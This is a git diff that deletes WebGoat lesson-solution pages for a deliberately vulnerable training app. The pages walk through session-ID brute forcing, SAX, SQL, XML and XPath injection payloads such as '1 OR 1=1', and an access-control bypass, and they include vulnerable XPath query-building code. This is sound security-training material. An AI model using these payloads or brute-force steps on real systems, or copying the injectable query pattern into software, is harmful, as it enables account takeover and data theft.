-To access the Session ID Analysis, you need to put WebScarab in its full-featured mode, if it isn't already. This can be enabled by going to Tools -> use full-featured interface in WebScarab.
-Click on the SessionID Analysis tab at the top of the page, then use the Previous Requests dropdown to select the most recent GET request with a 200 OK header. Its address will end with webgoat/attack, not an image or java file.
-
-
-Selecting the correct GET request for Session ID analysis.
-
-Next, we need to make sure that WebScarab is able to fetch the WEAKID cookie. Click the Test button at the bottom of the page. You should get a popup window showing the WEAKID.
-
-
-Succesful WEAKID test popup.
-
-If the popup indicates that no valid session is found, that means there is already a WEAKID value in the request. This prevents the "Set-Cookie" header from being sent in the response. To fix this, delete the WEAKID=value; portion of the Cookie header and press test again.
-
-Now we need to fetch a set of WEAKIDs. Enter "50" into the Samples field at the bottom of the window, then press Fetch. Switch to the "Analysis" tab. Select the WEAKID option from the Session Identifier dropdown, and the window should populate with WEAKID values.
-
-The WEAKID is divided into two parts: the first part before the dash is an identifier that increases by 1 in each cookie, and the part after the dash is a time value that is calculated when the request is submitted.
-Notice that there is sometimes a gap in the first value of the WEAKID, where one number is skipped. The missing value is what we need to log in, we just need to figure out the time stamp value that goes after the dash.
-It's simple to spot where this value is. Look at the "Difference" column on the analysis screen. Almost all of the values will be only one or two apart. We are looking for the record where this value is around double the rest of them.
-
-
-Analysis screen with the cookie of interest highlighted.
-
-This WEAKID follows the one we're trying to find. You will notice the identifier of the cookie preceding the highlighted one is two less, whereas all the other cookies decrease only by one. The one missing is what we want to find:
-16964-1312472439375
-16966-1312472439484
-The WEAKID beginning with 16965 is missing. This is the WEAKID we want, we just need to figure out the second part.
-
-We'll figure this out by using the brute force method. We will send requests with each possible timestamp value until we find one that is successful. Its timestamp must be between the two surrounding it:
-16964-1312472439375
-16965-?????????????
-16966-1312472439484
-
-So our timestamp is between 1312472439375 and 1312472439484. Now we just need a program to do brute force this for us. We will use J-Baah, previously known as Crowbar. Download it and run the .jar.
-We will configure J-Baah to send our request repeatedly, with a different WEAKID each time. Copy our RAW HTTP Request we used to generate these cookies, found under the Collection tab. Paste it in the Request box in J-Baah.
-
-The WEAKID paramter needs to be put into the request. It will begin with the missing value we figured out before the dash, 16965 in our case. How do we fill in the rest when we dont know what it is?
-In this case, we will add WEAKID=16965-1312472439##1##; to the Cookie paramter of our request. The ##1## replaces the part of the timestamp that varies in our range. Next, we specify this range. In the Paramter 1 Tab, we set From as 375, and To as 484.
-
-
-J-Baah setup.
-Lastly, go to the "Target" tab at the bottom right, and set the Host to localhost and the Port to whichever port WebGoat is using, generally 80 or 8080.
-Go back to the "Action" tab, and click Base Response. You should see a message on the bottom left that a response is generated successfully. Change Threads to 2 and then press Start. The bottom left window should start filling up with "Hijack a session"
-
-
-All of the responses for each WEAKID. The successful attempt is highlighted.
-
-
-Before we go any further, it is important to understand what is happening here. The ##1## string is replaced with a different number in the range we specified and the request is sent. The first WEAKID tried is 16965-1312472439375, then it tries every timestamp until the last one, 16965-1312472439484. J-Baah collects all of these responses and shows them in the bottom left window.
-
-Each line shows one response, and displays important information about it.
-0.99969 : 417 : : Hijack a Session
-Clicking base response tries the first WEAKID and sets its response as the control. This first number indicates how similar this response is to the base response. A value of 1 means the responses are identical. The further the number is from 1, the more different this response is.
-
-0.99969 : 417 : : Hijack a Session
-This second number is the value replacing the ##1## in our request.
-0.99969 : 417 : : Hijack a Session
-The last portion is the title of the response page. In this case, if it's not "Hijack a Session", something went wrong.
-
-The value indicating similarity to the base response will tell us which WEAKID worked. If everything went swimmingly, there should only be three values for this number. Look again at the screenshot above. There are many responses showing .99969, one showing .9949, then many more showing .99954. The response stayed the same until we got to the WEAKID ending in 429, then it changed. This is where the brute force succeeded. Right click on this response and click "Show Response".
-
-
-This WEAKID worked! We hijacked this session.
-
-Refreshing the lesson should show it is complete.
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK b/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK
deleted file mode 100644
index d2605b85c..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID.htmlBAK
+++ /dev/null
@@ -1,889 +0,0 @@
-
-
-
-
-
-
-
-Solution: How to Hijack a Session
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson
-Plan Title: How to
-Hijack a Session
-
-
-
-
Concept /
-Topic To Teach:
-
-
-
-
Application
-developers who develop their own session IDs frequently forget to incorporate
-the complexity and randomness necessary for security. If the user specific
-session ID is not complex and random, then the application is highly
-susceptible to session-based brute force attacks.
-
-
-
-
General
-Goal(s):
-
-
Try to access
-an authenticated session belonging to someone else.
-
-
-
-
-
-
In this
-lesson the purpose is to predict the WEAKID value. The WEAKID is used to
-differentiate authenticated and anonymous users of WebGoat.
-
-
-
-
-
-
-
-
-
-
Solution:
-
-
-
-
The easiest
-way to complete this lesson is to use WebScarab's Session ID Analysis.
-
-
-
-
Go to
-WebScarab and click on the button "SessionID Analysis". Select the last POST
-request from the "Previous requests" drop-down box.
-
-
-
-
Figure 1 WebScarabs SessionID Analysis
-
-
-
-
To make sure
-that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
-button on the bottom of the screen. A pop-up window must be shown like below.
-
-
-
-
-
-
Figure 2 SessionID WEAKID discovered
-
-
-
-
If you don’t
-have a pop-up window with the Extracted Sessionids, you must edit the Request.
-You must delete the WEAKID value from the request. Without this cookie value,
-WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
-learns about this value.
-
-
-
-
-
-
Fetch 50
-samples and examine the results. Enter "50" in the "Samples" window and click
-the button "Fetch". You will not see any information about progress.
-
-
-
-
-
-
-
-
Now you need
-to go to the tab "Analysis".
-
-
-
-
-
-
-
-
In the "Analysis"
-pane you see nothing.
-
-
-
-
You must
-select the Session Identifier WEAKID value from the drop-down box.
-
-
-
-
-
-
-
-
The WEAKID is
-divided in 2 parts: the first part is an identifier that is added 1 in every
-cookie and a time value. The time value is calculated at the moment that you
-submit the request.
-
-
-
-
Notice that
-there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
-value that is missing is the value that you need to know to log on. Now you
-only need to calculate the timestamp. This can be brute-forced using Crowbar.
-You know the previous timestamp and the next timestamp so you have a start and
-end value.
-You can download Crowbar for free: http://www.sensepost.com/research/crowbar/
-
-
-
-
-
-
-
-
-
There is a
-value 16935 and a value 16937 with a numeric difference of 28110 instead of
-14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
-request in Crowbar:
-
-
-
-
Figure 3 Crowbar
-
-
-
-
Change target
-to localhost and adjust the port.
-
-
Create a Base
-response. Make sure that you see "How to hijack a session" in the middle
-window.
-
-
-
-
Insert ##1##
-in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
-The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=16936-1163685##1##;
-Start the first loop at 363093, the last digits of the last cookie before the
-authentication cookie and 363203, the first cookie after the authentication
-cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
-between these two boundaries.
-
-
Examine the
-results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
-reply".
-
-
-
-
-
-
Figure 4 Lesson 12 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml
deleted file mode 100644
index 082acf789..000000000
--- a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/filelist.xml
+++ /dev/null
@@ -1,25 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png
deleted file mode 100644
index 560ca80c0..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png
deleted file mode 100644
index f0100265e..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png
deleted file mode 100644
index c42733b93..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png
deleted file mode 100644
index a34c6751c..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png
deleted file mode 100644
index 0c6fe9313..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image010.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png
deleted file mode 100644
index 46b787813..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image012.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png
deleted file mode 100644
index bde7fd0bd..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image014.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png
deleted file mode 100644
index d25bc4167..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image016.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png
deleted file mode 100644
index bb0344681..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image018.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg
deleted file mode 100644
index b825cea5d..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg
deleted file mode 100644
index a7fd9b516..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg
deleted file mode 100644
index b38898623..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image022.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg
deleted file mode 100644
index 0c3616032..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg
deleted file mode 100644
index 632ca5835..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image024.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg
deleted file mode 100644
index 0ab015bbb..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg
deleted file mode 100644
index bc5a7fe32..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg
deleted file mode 100644
index 7bbdb5f09..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg
deleted file mode 100644
index 4530c95f9..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image028.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg
deleted file mode 100644
index 112d5259b..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx b/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions_1/WeakSessionID_filesBAK/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions_1/WsSAXInjection.html b/src/main/webapp/lesson_solutions_1/WsSAXInjection.html
deleted file mode 100644
index c5e854290..000000000
--- a/src/main/webapp/lesson_solutions_1/WsSAXInjection.html
+++ /dev/null
@@ -1,917 +0,0 @@
-
-
-
-
-
-
-
-Solution: Web Service SAX Injection
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Web Service SAX
-Injection
-
-
-
-
Concept / Topic To Teach:
-
-
-
-
Web Services
-communicate through the use of SOAP requests. These requests are submitted to a
-web service in an attempt to execute a function defined in the web service
-definition language (WSDL) file.
-
-
-
-
General Goal(s):
-
-
Some web
-interfaces make use of Web Services in the background. If the frontend relies
-on the web service for all input validation, it may be possible to corrupt the
-XML that the web interface sends.
-
-
-
-
In this
-exercise, try to change the password for a user other than 101.
-
-
-
-
-
-
-
-
Solution:
-
-
-
-
To succeed
-this lesson it is required to reset the password of the user with a different
-user-ID then 101 (which is your user-ID)
-
-
.
-
-
When you fill
-out a password and click on "Go!" the following XML request will be created,
-submit and parsed by the SAX parser:
SAX parsers will parse anything that
-is well-formed, meaning that there are matching end and close tags and that the
-schema is correct. When you are able to add a new changePAssword element with
-corresponding id tag and password tag, the SAX parser will be more than happy
-to change the password for the user-ID provided.
-
-
So you need to have something like
-this as a final result:
There are field-limitations in the
-HTML input field, so it is required to intercept the HTTP Request with
-WebScarab and replace the parameter password with the payload.
-
-
-
-
Enter a password 'test' and click
-"Go!".
-
-
-
-
Figure
-113 Reset password with test
-
-
-
-
Intercept the request in WebScarab and
-replace the string test with the payload.
Lesson
-Plan Title: How to
-Perform Web Service SQL Injection
-
-
-
-
Concept /
-Topic To Teach:
-
-
Web
-Services communicate through the use of SOAP requests. These requests are
-submitted to a web service in an attempt to execute a function defined in the
-web service definition language (WSDL) file.
-
-
-
-
General
-Goal(s):
-
-
Check the web
-service description language (WSDL) file and try to obtain multiple customer
-credit card numbers. You will not see the results returned to this screen. When
-you believe you have suceeded, refresh the page and look for the 'green star'.
-
-
Solution:
-
-
-
-
This lesson
-can be solved easily by using a web services tool called SOAPUI. But here you
-will only use WebScarab. Go in WebScarab to the tab "Web Services". You will
-see a history of invoked web services or WSDL files.
-
-
-
-
-
-
Figure 1 Lesson 23
-
-
-
-
Open the
-WebGoat WSDL file for this lesson (WsSqlInjection?WSDL) in a new window.
-
-
-
-
In WebScarab
-you can select this WSDL from the top drop-down box. And WebScarab will parse
-the XML file so you can select the operations to invoke. Then you can enter a
-value for the parameters used to invoke the operation. For example fill out the
-integer 101 for the ID value and click "Execute". WebScarab will pop-up a basic
-authentication window. Enter username:guest, password:guest and host:localhost then click "Ok".
-If the pop-up does not appear you have to go to "Tools" > "Credentials". There you should activate "Ask when required".
-
-
-
-
-
-
Figure 2 Basic authentication
-
-
-
-
-
-
Figure 3 Webservice Response
-
-
-
-
What happens
-if you change 101 to 1 OR 1=1? Will you get all the credit cards?
-
-
Yes J
-
-
-
-
-
-
Figure 4 All the credit cards
-
-
-
-
Remark: when you don't get any responses you
-might want to select the service and operation again from the drop-down box. A nice
-feature here would be the ability to make a raw SOAP request.
Lesson
-Plan Title: How to
-Perform XML Injection Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform XML Injection attacks.
-
-
-
-
How the
-attacks works:
-
-
AJAX applications
-use XML to exchange information with the server. This XML can be easily
-intercepted and altered by a malicious attacker.
-
-
-
-
General
-Goal(s):
-
-
WebGoat-Miles
-Reward Miles shows all the rewards available. Once you've entered your account
-ID, the lesson will show you your balance and the products you can afford. Your
-goal is to try to add more rewards to your allowed set of rewards. Your account
-ID is 836239.
-
-
-
-
-
-
Figure 1 AJAX Security - XML Injection
-
-
-
-
Solution:
-
-
-
-
To understand
-the behavior of the AJAX application, enter your account number 836239 and
-intercept the HTTP Request and HTTP Response using WebScarab.
-
-
-
-
-
-
Figure 2 Enter account number
-
-
-
-
-
-
Figure 3 Intercepted HTTP Request
-
-
-
-
-
-
Figure 4 Intercepted HTTP Response
-
-
-
-
From the HTTP Response you can see that you get back an XML
-message with the rewards for your account:
-
-
-
-
<root>
-
-
<reward>WebGoat t-shirt 20 Pts</reward>
-
-
<reward>WebGoat Secure Kettle 50 Pts</reward>
-
-
<reward>WebGoat Mug 30 Pts</reward>
-
-
</root>
-
-
-
-
What happens if you intercept this HTTP Response and update
-the XML message to become:
-
-
-
-
<root>
-
-
<reward>WebGoat t-shirt 20 Pts</reward>
-
-
<reward>WebGoat Secure Kettle 50 Pts</reward>
-
-
<reward>WebGoat Mug 30 Pts</reward>
-
-
<reward>WebGoat Core Duo Laptop 2000
-Pts</reward>
-
-
<reward>WebGoat Hawaii Cruise 3000 Pts</reward>
-
-
</root>
-
-
-
-
-
-
Figure 5 Changed XML response
-
-
-
-
You need to
-do this three times!
-
-
-
-
-
-
Figure 6 Injected XML results
-
-
-
-
-
-
Figure 7 Select your reward
-
-
-
-
Select the
-Laptop and the Cruise and click "Submit".
Lesson
-Plan Title: How to
-Perform XPATH Injection Attacks.
-
-
-
-
Concept /
-Topic To Teach:
-
-
This lesson
-teaches how to perform XPath Injection attacks.
-
-
-
-
How the
-attacks works:
-
-
Similar to SQL
-Injection, XPATH Injection attacks occur when a web site uses user supplied
-information to query XML data. By sending intentionally malformed information
-into the web site, an attacker can find out how the XML data is structured or
-access data that they may not normally have access to. They may even be able to
-elevate their privileges on the web site if the xml data is being used for
-authentication (such as an xml based user file). Querying XML is done with
-XPath, a type of simple descriptive statement that allows the xml query to
-locate a piece of information. Like SQL you can specify certain attributes to
-find and patterns to match. When using XML for a web site it is common to
-accept some form of input on the query string to identify the content to locate
-and display on the page. This input must be sanitized to verify that it doesn't
-mess up the XPath query and return the wrong data.
-
-
-
-
General
-Goal(s):
-
-
The
-form below allows employees to see all their personal data including their
-salaries. Your account is Mike/test123. Your goal is to try to see other
-employees data as well.
-
-
-
-
-
-
Figure 1 XPath Injection
-
-
-
-
XPath injection is similar to SQL Injection. Input is not validated and
-used to create a XPath query. Here you can see how the XPATH query is built:
-
-String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
-File d = new File(dir);
-XPathFactory factory = XPathFactory.newInstance();
-XPath xPath = factory.newXPath();
-InputSource inputSource = new InputSource(new FileInputStream(d));
-String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + "']";
-nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);
-
-
-
-
-
-
-
-
Figure 2 Inject XPath payload
-
-
-Injecting Smith' or 1=1 or 'a'='a will log you on
-as the first user defined in the system. Password is a required field, so there
-you can enter whatever you want.
-This is what the server gets:
-expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a' and passwd/text()='password']"
-And this is how the server interprets it:
-expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a' and passwd/text()='password' ) ]"
-
-
-
-
-
-
-
-As you can see the delete action is called DeleteProfile.
-Now log in as Tom. Click in the list on his name and make sure WebScarab
-will intercept the next request. Click on a button, for example the
-'ViewProfile' button. Change in WebScarab the action to DeleteProfile
-and you are done!
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html b/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html
deleted file mode 100644
index e94e42c45..000000000
--- a/src/main/webapp/lesson_solutions_1/Lab Access Control/Lab Bypass Data Layer Access Control.html
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
